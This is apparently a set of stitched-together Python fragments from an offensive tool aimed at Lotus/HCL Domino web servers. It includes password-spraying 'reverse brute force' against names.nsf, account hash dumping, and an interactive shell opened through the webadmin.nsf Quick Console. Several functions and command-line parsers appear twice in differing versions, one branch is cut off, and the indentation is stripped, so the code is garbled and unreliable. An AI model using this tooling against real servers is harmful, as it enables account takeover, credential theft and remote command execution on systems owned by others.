def check_access(target, header, username, password):
session = requests.Session()
session.auth = (username, password)
try:
webadmin_url = "{0}/webadmin.nsf".format(target)
check_webadmin = session.get(webadmin_url, headers=header, verify=False)
if check_webadmin.status_code == 200:
if 'form method="post"' in check_webadmin.text:
utility.print_warn('Unable to access webadmin.nsf, maybe you are not admin?')
else:
path_url = "{0}/webadmin.nsf/fmpgHomepage?ReadForm".format(target)
check_path = session.get(path_url, headers=header, verify=False)
path_regex = re.search('>(?i)([a-z]:\\\\[a-z0-9()].+\\\\[a-z].+)\\\\domino\\\\data', check_path.text)
if path_regex:
path = path_regex.group(1)
else:
path = None
utility.print_status('Could not identify Domino file path, trying defaults...')
who_am_i, local_path = test_command(target, header, path, username, password)
if who_am_i and local_path:
utility.print_good("Running as {0}".format(who_am_i))
Interactive(target, header, local_path, username, password).cmdloop()
else:
utility.print_warn('Unable to access webadmin.nsf!')
elif check_webadmin.status_code == 401:
utility.print_warn('Unable to access webadmin.nsf, maybe you are not admin?!')
else:
utility.print_warn('Unable to find webadmin.nsf!')
except Exception as error:
utility.print_error("Error: {0}".format(error))
def reverse_bruteforce(target, usernames, password, auth):
username_list = []
valid_usernames = []
names_url = "{0}/names.nsf".format(target)
# Import usernames from file
username_file = open(usernames, 'r')
for username in username_file:
username_list.append(username.rstrip())
username_file.close()
# Start reverse brute force
for username in username_list:
jitter = random.random()
time.sleep(jitter)
try:
if auth == 'basic':
access = utility.basic_auth(names_url, username, password)
elif auth == 'form':
access, session = utility.form_auth(names_url, username,
password)
elif auth == 'open':
utility.print_good(
"{0} does not require authentication".format(names_url))
break
else:
utility.print_warn("Could not find {0}".format(names_url))
break
if access:
utility.print_good("Valid account: {0} {1}".format(
username, password))
valid_usernames.append(username)
else:
pass
except KeyboardInterrupt:
break
except Exception as error:
utility.print_error("Error: {0}".format(error))
continue
# Print found usernames
if len(valid_usernames) > 0:
if len(valid_usernames) == 1:
plural = ''
else:
plural = 's'
utility.print_status("Found {0} valid account{1}".format(
len(valid_usernames), plural))
for valid_username in valid_usernames:
print("{0} {1}".format(valid_username, password))
else:
utility.print_warn('No valid accounts found')
def reverse_bruteforce(target, usernames, password, auth):
username_list = []
valid_usernames = []
names_url = "{0}/names.nsf".format(target)
# Import usernames from file
username_file = open(usernames, 'r')
for username in username_file:
username_list.append(username.rstrip())
username_file.close()
# Start reverse brute force
for username in username_list:
jitter = random.random()
time.sleep(jitter)
try:
if auth == 'basic':
access = utility.basic_auth(names_url, username, password)
elif auth == 'form':
access, session = utility.form_auth(names_url, username, password)
elif auth == 'open':
utility.print_good("{0} does not require authentication".format(names_url))
break
else:
utility.print_warn("Could not find {0}".format(names_url))
break
if access:
utility.print_good("Valid account: {0} {1}".format(username, password))
valid_usernames.append(username)
else:
pass
except KeyboardInterrupt:
break
except Exception as error:
utility.print_error("Error: {0}".format(error))
continue
# Print found usernames
if len(valid_usernames) > 0:
if len(valid_usernames) == 1:
plural = ''
else:
plural = 's'
utility.print_status("Found {0} valid account{1}".format(len(valid_usernames), plural))
for valid_username in valid_usernames:
print("{0} {1}".format(valid_username, password))
else:
utility.print_warn('No valid accounts found')
def check_access(target, username, password, auth):
webadmin_url = "{0}/webadmin.nsf".format(target)
try:
# Check access
if auth == 'basic':
access = utility.basic_auth(webadmin_url, username, password)
session = None
elif auth == 'form':
access, session = utility.form_auth(webadmin_url, username, password)
else:
session = None
# Get local file path
path_url = "{0}/webadmin.nsf/fmpgHomepage?ReadForm".format(target)
if access or auth == 'open':
if auth == 'basic':
check_path = requests.get(path_url, headers=utility.get_headers(), auth=(username, password), verify=False)
elif auth == 'form':
check_path = session.get(path_url, headers=utility.get_headers(), verify=False)
else:
check_path = requests.get(path_url, headers=utility.get_headers(), verify=False)
path_regex = re.compile("DataDirectory\s*=\s*'(.+)';", re.I)
if path_regex.search(check_path.text):
local_path = path_regex.search(check_path.text).group(1)
else:
local_path = None
utility.print_warn('Could not identify Domino file path!')
# Get operating system
if 'UNIX' in check_path.text:
os = 'linux'
elif 'Windows' in check_path.text:
os = 'windows'
else:
os = 'windows'
utility.print_status('Could not identify Domino operating system!')
# Test writing to local file system
whoami, path, hostname = test_command(target, os, local_path, username, password, session)
if whoami and path:
Interactive(target, os, path, username, password, whoami, hostname, session).cmdloop()
else:
utility.print_warn('Unable to access webadmin.nsf!')
else:
utility.print_warn("Unable to access {0}, you might not be an admin!".format(webadmin_url))
except Exception as error:
utility.print_error("Error: {0}".format(error))
brute_parser.add_argument('url', help='Domino server URL')
brute_parser.add_argument('userlist', help='List of usernames')
brute_parser.add_argument('--password', help='Password', default='', nargs='+', required=False)
args = parser.parse_args()
# Process Domino URL
target = utility.check_url(args.url)
if target:
# Detect type of authentication
auth_type = utility.detect_auth(target)
if auth_type:
# Fingerprint
if args.action == 'fingerprint':
utility.print_status('Fingerprinting Domino server')
fingerprint.fingerprint(target, args.username, ' '.join(args.password), auth_type)
# Dump hashes
elif args.action == 'hashdump':
utility.print_status('Dumping account hashes')
hashdump.enum_accounts(target, args.username, ' '.join(args.password), auth_type)
# Interact with Quick Console
elif args.action == 'console':
utility.print_status('Accessing Domino Quick Console')
quickconsole.check_access(target, args.username, ' '.join(args.password), auth_type)
# Reverse brute force
else:
if os.path.isfile(args.userlist):
parser.add_argument('-p', '--password', help='Password', default='', nargs='+', required=False)
parser.add_argument('--hashdump', help='Dump Domino hashes', action='store_true', required=False)
parser.add_argument('--quickconsole', help='Interact with Domino Quick Console', action='store_true', required=False)
args = parser.parse_args()
HEADER = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
}
# Process Domino URL
target = utility.process_url(args.url)
# Interact with quick console
if args.quickconsole:
utility.print_status('Accessing Domino Quick Console...')
quickconsole.check_access(target, HEADER, args.username, ' '.join(args.password))
# Dump hashes
elif args.hashdump:
utility.print_status('Enumerating accounts...')
hashdump.enum_accounts(target, HEADER, args.username, ' '.join(args.password))
# Fingerprint
else:
utility.print_status('Fingerprinting Domino server...')
fingerprint.fingerprint(target, HEADER)
fingerprint.check_portals(target, HEADER)
parser.add_argument('--quickconsole', help='Interact with Domino Quick Console', action='store_true', required=False)
parser.add_argument('--bruteforce', help='Reverse brute force Domino server', action='store_true', required=False)
args = parser.parse_args()
# Process Domino URL
target = utility.check_url(args.url)
if target == None:
utility.print_warn('Please provide a valid URL!')
else:
# Detect type of authentication the Domino server is using
auth_type = utility.detect_auth(target)
# Interact with quick console
if args.quickconsole:
utility.print_status('Accessing Domino Quick Console...')
quickconsole.check_access(target, args.username, ' '.join(args.password), auth_type)
# Dump hashes
elif args.hashdump:
utility.print_status('Dumping account hashes...')
hashdump.enum_accounts(target, args.username, ' '.join(args.password), auth_type)
# Reverse brute force
elif args.bruteforce:
if os.path.isfile(args.username):
utility.print_status("Starting reverse brute force with {0} as the password...".format(' '.join(args.password)))
bruteforce.reverse_bruteforce(target, args.username, ' '.join(args.password), auth_type)
else:
utility.print_warn('You must supply the full path to a file containing a list of usernames!')
